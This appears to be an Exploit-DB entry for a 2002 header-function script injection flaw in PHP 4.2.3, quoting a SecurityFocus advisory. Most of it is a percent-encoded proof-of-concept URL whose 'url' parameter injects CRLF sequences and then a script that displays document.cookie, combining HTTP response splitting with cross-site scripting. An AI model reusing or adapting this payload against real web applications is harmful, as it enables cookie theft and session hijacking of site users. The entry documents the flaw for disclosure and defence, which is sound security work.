PHP 4.2.3 Header Function Script Injection Vulnerability

2002-09-07T00:00:00
ID EDB-ID:21776
Type exploitdb
Reporter Matthew Murphy
Modified 2002-09-07T00:00:00

Description

PHP 4.2.3 Header Function Script Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/5669/info

PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems.

It has been reported that a vulnerability in the PHP header function exists. It may be possible for a user to supply arbitrary script code in an URL that would allow the injection of script code into the HTTP header. 

http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%
6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2
1%2D%2D